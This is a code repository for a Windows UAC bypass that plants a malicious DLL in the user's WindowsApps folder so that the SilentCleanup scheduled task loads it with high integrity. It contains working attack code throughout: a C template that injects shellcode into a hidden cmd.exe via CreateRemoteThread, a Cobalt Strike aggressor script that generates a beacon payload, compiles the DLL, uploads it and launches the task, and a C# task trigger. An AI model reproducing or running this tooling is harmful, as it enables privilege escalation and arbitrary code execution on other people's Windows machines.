├── .gitignore
├── dllmain.def
├── SilentClean
    ├── SilentClean
    │   ├── ILMergeOrder.txt
    │   ├── packages.config
    │   ├── Program.cs
    │   ├── Properties
    │   │   └── AssemblyInfo.cs
    │   ├── ILMerge.props
    │   └── SilentClean.csproj
    ├── .gitignore
    └── SilentClean.sln
├── dllmain_template.c
├── README.md
└── AggressiveClean.cna


/.gitignore:
--------------------------------------------------------------------------------
1 | *.DS_Store
2 | 


--------------------------------------------------------------------------------
/dllmain.def:
--------------------------------------------------------------------------------
1 | EXPORTS
2 | 	DllMain
3 | 


--------------------------------------------------------------------------------
/SilentClean/SilentClean/ILMergeOrder.txt:
--------------------------------------------------------------------------------
1 | # this file contains the partial list of the merged assemblies in the merge order
2 | # you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
3 | # and finetune merge order to your satisfaction
4 | 
5 | 


--------------------------------------------------------------------------------
/SilentClean/SilentClean/packages.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <packages>
3 |   <package id="ILMerge" version="3.0.29" targetFramework="net35" />
4 |   <package id="MSBuild.ILMerge.Task" version="1.1.3" targetFramework="net35" />
5 |   <package id="TaskScheduler" version="2.8.21" targetFramework="net35" />
6 | </packages>


--------------------------------------------------------------------------------
/SilentClean/.gitignore:
--------------------------------------------------------------------------------
 1 | # Autosave files
 2 | *~
 3 | 
 4 | # build
 5 | [Oo]bj/
 6 | [Bb]in/
 7 | packages/
 8 | TestResults/
 9 | 
10 | # globs
11 | .vs/
12 | Makefile.in
13 | *.DS_Store
14 | *.sln.cache
15 | *.suo
16 | *.cache
17 | *.pidb
18 | *.userprefs
19 | *.usertasks
20 | config.log
21 | config.make
22 | config.status
23 | aclocal.m4
24 | install-sh
25 | autom4te.cache/
26 | *.user
27 | *.tar.gz
28 | tarballs/
29 | test-results/
30 | Thumbs.db
31 | 
32 | # Mac bundle stuff
33 | *.dmg
34 | *.app
35 | 
36 | # resharper
37 | *_Resharper.*
38 | *.Resharper
39 | 
40 | # dotCover
41 | *.dotCover
42 | 
43 | 


--------------------------------------------------------------------------------
/SilentClean/SilentClean/Program.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Text.RegularExpressions;
 3 | using Microsoft.Win32.TaskScheduler;
 4 | 
 5 | namespace SilentClean
 6 | {
 7 |     class Program
 8 |     {
 9 |         static void Main(string[] args)
10 |         {
11 |             try
12 |             {
13 |                 var hostname = Environment.GetEnvironmentVariable("COMPUTERNAME");
14 |                 using (TaskService tasksrvc = new TaskService(@"\\"+ hostname, "", "", "", false))
15 |                 {
16 |                     var task = tasksrvc.FindAllTasks(new Regex("SilentClean*"));
17 |                     Console.WriteLine("\n[*] Starting Task");
18 |                     task[0].RunEx(TaskRunFlags.IgnoreConstraints | TaskRunFlags.UseSessionId, 1, "", "");
19 |                     Console.WriteLine("\n[*] Make sure to clean-after yourself and remove the dropped DLL");
20 |                 }
21 |             } catch (Exception e)
22 |             {
23 |                 Console.WriteLine(e.Message);
24 |                 Console.WriteLine(e.StackTrace);
25 |             }
26 |         }
27 |     }
28 | }
29 | 


--------------------------------------------------------------------------------
/SilentClean/SilentClean.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 15
 4 | VisualStudioVersion = 15.0.28307.1169
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SilentClean", "SilentClean\SilentClean.csproj", "{948152A4-A4A1-4260-A224-204255BFEE72}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|Any CPU = Debug|Any CPU
11 | 		Release|Any CPU = Release|Any CPU
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{948152A4-A4A1-4260-A224-204255BFEE72}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | 		{948152A4-A4A1-4260-A224-204255BFEE72}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | 		{948152A4-A4A1-4260-A224-204255BFEE72}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | 		{948152A4-A4A1-4260-A224-204255BFEE72}.Release|Any CPU.Build.0 = Release|Any CPU
18 | 	EndGlobalSection
19 | 	GlobalSection(SolutionProperties) = preSolution
20 | 		HideSolutionNode = FALSE
21 | 	EndGlobalSection
22 | 	GlobalSection(ExtensibilityGlobals) = postSolution
23 | 		SolutionGuid = {D27EECDA-38CD-4013-9BEA-714084972122}
24 | 	EndGlobalSection
25 | EndGlobal
26 | 


--------------------------------------------------------------------------------
/dllmain_template.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <windows.h>
 4 | 
 5 | %%BUFFER%%
 6 | 
 7 | DWORD WINAPI RunMe()
 8 | {
 9 | 	HANDLE pHandle;
10 | 	PVOID remoteBuffer;
11 | 	STARTUPINFO SI = { 0 };
12 | 	PROCESS_INFORMATION PI = { 0 };	
13 | 	ZeroMemory(&SI, sizeof(SI));
14 | 	SI.cb = sizeof(SI);
15 | 	ZeroMemory(&PI, sizeof(PI));
16 | 	SI.dwFlags = 1;
17 | 	SI.wShowWindow = 0;
18 | 	if(!CreateProcessWithLogonW(L"aaa", L"bbb", L"ccc", 0x00000002, L"C:\\Windows\\System32\\cmd.exe", NULL, 0x04000000, NULL, L"c:\\windows\\system32\\", &SI, &PI)) {
19 | 		return 0;
20 | 	}
21 | 	pHandle = PI.hProcess;
22 | 	remoteBuffer = VirtualAllocEx(pHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
23 | 	if (remoteBuffer != NULL)
24 | 	{
25 | 		WriteProcessMemory(pHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
26 | 		CreateRemoteThread(pHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
27 | 	}
28 | 	CloseHandle(pHandle);
29 | 	CloseHandle(PI.hThread);
30 | 	return 0;
31 | }
32 | 
33 | 
34 | BOOL WINAPI DllMain(HINSTANCE hDll, DWORD dwReason, LPVOID lpReserved) {
35 | 	switch( dwReason ) 
36 |     { 
37 |         case DLL_PROCESS_ATTACH:
38 | 	        RunMe();
39 |             break;
40 | 
41 |         case DLL_THREAD_ATTACH:
42 |             break;
43 | 
44 |         case DLL_THREAD_DETACH:
45 |             break;
46 | 
47 |         case DLL_PROCESS_DETACH:
48 |             break;
49 |     }
50 | 
51 |     return FALSE;
52 | }
53 | 


--------------------------------------------------------------------------------
/SilentClean/SilentClean/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // General Information about an assembly is controlled through the following
 6 | // set of attributes. Change these attribute values to modify the information
 7 | // associated with an assembly.
 8 | [assembly: AssemblyTitle("")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("")]
13 | [assembly: AssemblyCopyright("")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components.  If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 | 
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("948152a4-a4a1-4260-a224-204255bfee72")]
24 | 
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | //      Major Version
28 | //      Minor Version
29 | //      Build Number
30 | //      Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # SilentClean UAC bypass via binary planting
 2 | 
 3 | This project implements a DLL planting technique to bypass UAC Always Notify and execute code in a high integrity process. 
 4 | 
 5 | When SilentCleanup task is launched, `dismhost` searches for the non existing DLL `api-ms-win-core-kernel32-legacy-l1.dll` under: 
 6 | 
 7 | ```
 8 | C:\Users\USER\Appdata\Local\Microsoft\WindowsApps
 9 | ```
10 | 
11 | The above path exists by default in the PATH of the user.
12 | 
13 | By crafting a malicious DLL and placing it in the above directory, it will be loaded by `dismhost.exe` and executed with High Integrity privileges.
14 | 
15 | ## Implementation
16 | 
17 | The project consists of:
18 | 
19 | * **SilentClean .NET project** - Launching SilentClean scheduled task with the use of the TaskScheduler library
20 | 
21 | * **DLLmain_template.c** - A DLL skeleton which will spawn a process and inject the shellcode of our choice. Sample provided implements a simple CreateRemoteThread injector.
22 | 
23 | * **Cobalt strike aggressor script responsible for**:
24 | 	* Generating the shellcode byte array
25 | 	* Replacing dllmain_template.c with the above shellcode
26 | 	* Compile the dll with mingw
27 | 	* Upload the dll to the required path
28 | 	* Execute .NET binary SilentClean.exe through Execute-Assembly to launch the scheduled task
29 | 
30 | ## Configuration
31 | 
32 | * Feel free to replace injection method in RunMe function of `dllmain_template.c`. **This is just a POC** 
33 | * Current spawned process to inject to is `cmd.exe`. 
34 | * No shellcode encryption / compression has been baked in. As such the DLL generated will probably be **flagged by an AV**
35 | * x86_64-w64-mingw32 and headers are required to be installed on the building system
36 | * If CNA can not find mingw replace the variables $mingwgcc $mingwdllwrap with your path
37 | * Compile SilentClean .NET project and place executable in the same folder as the CNA script
38 | 
39 | 
40 | ## Versions tested
41 | 
42 | * Microsoft Windows 10 - 1909 18363.1110
43 | * Microsoft Windows 10 - 1909 18363.1082
44 | * Microsoft Windows 10 - 1809 17763.1457
45 | 
46 | ## Author
47 | 
48 | * [@leftp](https://github.com/leftp)
49 | * [@cirrusj](https://github.com/cirrusj)
50 | 


--------------------------------------------------------------------------------
/AggressiveClean.cna:
--------------------------------------------------------------------------------
 1 | $mingwgcc = exec("which x86_64-w64-mingw32-gcc");
 2 | $mingwdllwrap = exec("which x86_64-w64-mingw32-dllwrap");
 3 | 
 4 | sub uac-silentcleanup {
 5 | 	if (-is64 $1) 
 6 | 	{
 7 | 		$arch = "x64";
 8 | 		$shellcode = artifact_payload($2, "raw", $arch); # generate shellcode for x64
 9 | 	} 
10 | 	else 
11 | 	{
12 | 		$arch = "x86";
13 | 		$shellcode = artifact_payload($2, "raw", $arch); # generate shellcode for x86
14 | 	}
15 | 
16 | 	btask($1, "User tasked beacon to bypass UAC with silentcleanup scheduled task DLL planting", "T1548.002");
17 | 	$user = binfo($1, "user");
18 | 
19 | 	# String building for shellcode into template
20 | 	$shellbuf = "char shellcode[] = \"" . format_bytes($shellcode) . "\";\n";
21 | 	$handle = openf(script_resource("dllmain_template.c"));
22 | 	$data   = readb($handle, -1);
23 | 	closef($handle);
24 | 
25 | 	$fdata = strrep($data, "%%BUFFER%%", $shellbuf);
26 | 	$destination = openf(">".script_resource("dllmain.c"));
27 | 	writeb($destination,$fdata);
28 | 	closef($destination);
29 | 
30 | 	if (-is64 $1) 
31 | 	{
32 | 		$build = exec($mingwgcc . " -m64 -c -Os " . script_resource("dllmain.c") . " -Wall -shared -o " . getFileParent(script_resource("dllmain.c")) . "/dllmain.o");
33 | 
34 | 		wait($build);
35 | 	
36 | 		$wrap = exec($mingwdllwrap . " -m64 --def " . script_resource("dllmain.def") . " " . script_resource("dllmain.o") . " -o " . getFileParent(script_resource("dllmain.c")) . "/api-ms-win-core-kernel32-legacy-l1.dll");
37 | 
38 | 		wait($wrap);
39 | 	}
40 | 	else
41 | 	{
42 | 		$build = exec($mingwgcc . " -m32 -c -Os " . script_resource("dllmain.c") . " -Wall -shared -o " . getFileParent(script_resource("dllmain.c")) . "/dllmain.o");
43 | 
44 | 		wait($build);
45 | 	
46 | 		$wrap = exec($mingwdllwrap . " -m32 --def " . script_resource("dllmain.def") . " " . script_resource("dllmain.o") . " -o " . getFileParent(script_resource("dllmain.c")) . "/api-ms-win-core-kernel32-legacy-l1.dll");
47 | 
48 | 		wait($wrap);
49 | 	}
50 | 
51 | 	$dll = openf(script_resource("api-ms-win-core-kernel32-legacy-l1.dll"));
52 | 	$dllbytes = readb($dll, -1);
53 | 	closef($dll);
54 | 
55 | 	bupload_raw($1, "C:\\Users\\" . $user . "\\Appdata\\Local\\Microsoft\\WindowsApps\\api-ms-win-core-kernel32-legacy-l1.dll", $dllbytes);
56 | 
57 | 	bexecute_assembly($1, script_resource("SilentClean.exe"));
58 | }
59 | 
60 | sub format_bytes {
61 | 	$key = $1;
62 | 	@fmt = str_chunk(transform($key, "veil"), 60);
63 | 	return "". join("\"\n\"", @fmt);
64 | }
65 | 
66 | beacon_exploit_register("uac-silentcleanup-1909", "Scheduled task uac bypass using silentcleanup with DLL planting", &uac-silentcleanup);


--------------------------------------------------------------------------------
/SilentClean/SilentClean/ILMerge.props:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8" ?>
 2 | <Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <PropertyGroup>
 4 |     <!--                                                                                   -->
 5 |     <!-- ILMerge project-specific settings. Almost never need to be set explicitly.       -->
 6 |     <!-- for details, see http://research.microsoft.com/en-us/people/mbarnett/ilmerge.aspx -->
 7 |     <!--                                                                                   -->
 8 |     <!-- *** set this file to Type=None, CopyToOutput=Never ***                            -->
 9 | 
10 |     <!-- If True, all copy local dependencies will also be merged from referenced projects whether they are referenced in the current project explicitly or not -->
11 |     <ILMergeTransitive>true</ILMergeTransitive>
12 | 
13 |     <!-- Extra ILMerge library paths (semicolon-separated). Dont put your package dependencies here, they will be added automagically -->
14 |     <ILMergeLibraryPath></ILMergeLibraryPath>
15 | 
16 |     <!-- The solution NuGet package directory if not standard 'SOLUTION\packages' -->
17 |     <ILMergePackagesPath></ILMergePackagesPath>
18 | 
19 |     <!-- The merge order file name if differs from standard 'ILMergeOrder.txt' -->
20 |     <ILMergeOrderFile></ILMergeOrderFile>
21 | 
22 |     <!-- The strong key file name if not specified in the project -->
23 |     <ILMergeKeyFile></ILMergeKeyFile>
24 | 
25 |     <!-- The assembly version if differs for the version of the main assembly -->
26 |     <ILMergeAssemblyVersion></ILMergeAssemblyVersion>
27 | 
28 |     <!-- added in Version 1.0.4 -->
29 |     <ILMergeFileAlignment></ILMergeFileAlignment>
30 | 
31 |     <!-- added in Version 1.0.4, default=none -->
32 |     <ILMergeAllowDuplicateType></ILMergeAllowDuplicateType>
33 | 
34 |     <!-- If the <see cref="CopyAttributes"/> is also set, any assembly-level attributes names that have the same type are copied over into the target assembly -->
35 |     <ILMergeAllowMultipleAssemblyLevelAttributes></ILMergeAllowMultipleAssemblyLevelAttributes>
36 | 
37 |     <!-- See ILMerge documentation -->
38 |     <ILMergeAllowZeroPeKind></ILMergeAllowZeroPeKind>
39 | 
40 |     <!-- The assembly level attributes of each input assembly are copied over into the target assembly -->
41 |     <ILMergeCopyAttributes></ILMergeCopyAttributes>
42 |     
43 |     <!-- Creates a .pdb file for the output assembly and merges into it any .pdb files found for input assemblies, default=true -->
44 |     <ILMergeDebugInfo></ILMergeDebugInfo>
45 | 
46 |     <!-- Target assembly will be delay signed -->
47 |     <ILMergeDelaySign></ILMergeDelaySign>
48 | 
49 |     <!-- Types in assemblies other than the primary assembly have their visibility modified -->
50 |     <ILMergeInternalize></ILMergeInternalize>
51 | 
52 |     <!-- The path name of the file that will be used to identify types that are not to have their visibility modified -->
53 |     <ILMergeInternalizeExcludeFile></ILMergeInternalizeExcludeFile>
54 | 
55 |     <!-- XML documentation files are merged to produce an XML documentation file for the target assembly -->
56 |     <ILMergeXmlDocumentation></ILMergeXmlDocumentation>
57 | 
58 |     <!-- External assembly references in the manifest of the target assembly will use full public keys (false) or public key tokens (true, default value) -->
59 |     <ILMergePublicKeyTokens></ILMergePublicKeyTokens>
60 | 
61 |     <!-- Types with the same name are all merged into a single type in the target assembly -->
62 |     <ILMergeUnionMerge></ILMergeUnionMerge>
63 | 
64 |     <!-- The version of the target framework, default 40 (works for 45 too) -->
65 |     <ILTargetPlatform></ILTargetPlatform>
66 |   </PropertyGroup>
67 | </Project>
68 | 


--------------------------------------------------------------------------------
/SilentClean/SilentClean/SilentClean.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props" Condition="Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" />
 4 |   <Import Project="..\packages\ILMerge.3.0.29\build\ILMerge.props" Condition="Exists('..\packages\ILMerge.3.0.29\build\ILMerge.props')" />
 5 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 6 |   <PropertyGroup>
 7 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 8 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 9 |     <ProjectGuid>{948152A4-A4A1-4260-A224-204255BFEE72}</ProjectGuid>
10 |     <OutputType>Exe</OutputType>
11 |     <RootNamespace>SilentClean</RootNamespace>
12 |     <AssemblyName>SilentClean</AssemblyName>
13 |     <TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
14 |     <FileAlignment>512</FileAlignment>
15 |     <Deterministic>true</Deterministic>
16 |     <NuGetPackageImportStamp>
17 |     </NuGetPackageImportStamp>
18 |   </PropertyGroup>
19 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
20 |     <PlatformTarget>AnyCPU</PlatformTarget>
21 |     <DebugSymbols>true</DebugSymbols>
22 |     <DebugType>full</DebugType>
23 |     <Optimize>false</Optimize>
24 |     <OutputPath>bin\Debug\</OutputPath>
25 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
26 |     <ErrorReport>prompt</ErrorReport>
27 |     <WarningLevel>4</WarningLevel>
28 |   </PropertyGroup>
29 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
30 |     <PlatformTarget>AnyCPU</PlatformTarget>
31 |     <DebugType>pdbonly</DebugType>
32 |     <Optimize>true</Optimize>
33 |     <OutputPath>bin\Release\</OutputPath>
34 |     <DefineConstants>TRACE</DefineConstants>
35 |     <ErrorReport>prompt</ErrorReport>
36 |     <WarningLevel>4</WarningLevel>
37 |   </PropertyGroup>
38 |   <ItemGroup>
39 |     <Reference Include="Microsoft.Win32.TaskScheduler, Version=2.8.21.0, Culture=neutral, PublicKeyToken=c416bc1b32d97233, processorArchitecture=MSIL">
40 |       <HintPath>..\packages\TaskScheduler.2.8.21\lib\net35\Microsoft.Win32.TaskScheduler.dll</HintPath>
41 |     </Reference>
42 |     <Reference Include="System" />
43 |     <Reference Include="System.Core" />
44 |     <Reference Include="System.Drawing" />
45 |     <Reference Include="System.Xml.Linq" />
46 |     <Reference Include="System.Data.DataSetExtensions" />
47 |     <Reference Include="System.Data" />
48 |     <Reference Include="System.Xml" />
49 |   </ItemGroup>
50 |   <ItemGroup>
51 |     <Compile Include="Program.cs" />
52 |     <Compile Include="Properties\AssemblyInfo.cs" />
53 |   </ItemGroup>
54 |   <ItemGroup>
55 |     <None Include="ILMerge.props" />
56 |     <None Include="packages.config" />
57 |   </ItemGroup>
58 |   <ItemGroup>
59 |     <Content Include="ILMergeOrder.txt" />
60 |   </ItemGroup>
61 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
62 |   <Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
63 |     <PropertyGroup>
64 |       <ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them.  For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
65 |     </PropertyGroup>
66 |     <Error Condition="!Exists('..\packages\ILMerge.3.0.29\build\ILMerge.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\ILMerge.3.0.29\build\ILMerge.props'))" />
67 |     <Error Condition="!Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props'))" />
68 |     <Error Condition="!Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets'))" />
69 |   </Target>
70 |   <Import Project="..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets" Condition="Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" />
71 | </Project>


--------------------------------------------------------------------------------